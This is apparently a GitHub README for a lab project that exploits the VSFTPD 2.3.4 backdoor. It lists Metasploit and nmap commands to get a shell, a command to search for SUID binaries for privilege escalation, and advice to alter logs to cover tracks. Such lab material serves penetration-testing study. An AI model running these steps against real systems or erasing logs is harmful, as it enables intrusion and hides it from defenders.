Welcome to the VSFTPD Backdoor Exploit repository! This project demonstrates the hands-on exploitation of the VSFTPD 2.3.4 backdoor vulnerability. By utilizing Metasploit, you can gain shell access, create users, modify logs, and attempt privilege escalation in a secure lab environment.
- Introduction
- Prerequisites
- Installation
- Usage
- Exploit Details
- Features
- Log Analysis
- Privilege Escalation
- Nmap Scripts
- Contributing
- License
- Acknowledgments
The VSFTPD 2.3.4 backdoor vulnerability allows attackers to gain unauthorized access to systems running this version of the VSFTPD server. This repository provides a structured approach to exploit this vulnerability using Metasploit, a powerful penetration testing framework.
Before you begin, ensure you have the following installed:
-
Kali Linux or any Linux distribution with Metasploit.
-
Metasploit Framework: You can install it using the following command:
sudo apt-get install metasploit-framework
-
Nmap: A network scanning tool that can be installed via:
sudo apt-get install nmap
-
Clone the repository:
git clone https://github.com/Daniel1234mata/vsftpd-backdoor-exploit.git cd vsftpd-backdoor-exploit -
Ensure all dependencies are installed:
sudo apt-get install -y metasploit-framework nmap
To exploit the VSFTPD backdoor vulnerability, follow these steps:
-
Start Metasploit:
msfconsole
-
Use the exploit module:
use exploit/unix/ftp/vsftpd_234_backdoor
-
Set the target IP address:
set RHOST <target_ip>
-
Execute the exploit:
exploit
-
You should now have shell access to the target system.
For detailed steps and commands, refer to the Releases section.
The VSFTPD 2.3.4 backdoor vulnerability is a well-known issue that allows remote attackers to execute arbitrary commands. The vulnerability lies in the way the server handles certain FTP commands, specifically when a backdoor command is sent.
- The attacker connects to the VSFTPD server.
- The attacker sends a specially crafted command.
- The server executes the command, granting the attacker shell access.
- Shell Access: Gain immediate access to the target system.
- User Management: Create, modify, or delete users on the target system.
- Log Modification: Alter logs to cover tracks.
- Privilege Escalation: Attempt to gain higher privileges on the system.
Understanding logs is crucial for any ethical hacking operation. The following steps can help you analyze logs effectively:
- Access Logs: Review the FTP access logs to identify unauthorized access attempts.
- Modify Logs: If needed, modify logs to erase traces of exploitation.
To view the logs, use:
cat /var/log/vsftpd.logTo modify logs, you can use:
echo "Unauthorized access attempt" >> /var/log/vsftpd.logAfter gaining shell access, you may want to escalate your privileges. Here are some common methods:
-
Check for SUID binaries:
find / -perm -4000 -type f 2>/dev/null -
Kernel Exploits: Search for known kernel exploits that apply to the version of the operating system.
-
Password Files: Check for password files that may contain weak or default passwords.
Nmap can be used to scan for vulnerable VSFTPD instances. Here’s how to do it:
-
Run a basic scan:
nmap -sV <target_ip>
-
Use Nmap scripts to check for the VSFTPD vulnerability:
nmap --script ftp-vsftpd-backdoor -p 21 <target_ip>
Contributions are welcome! If you have suggestions for improvements or additional features, please fork the repository and submit a pull request.
This project is licensed under the MIT License. See the LICENSE file for details.
- Metasploit Framework
- Nmap
- Community contributors for their valuable insights and improvements.
For more detailed instructions and to download the latest version of this project, visit the Releases section.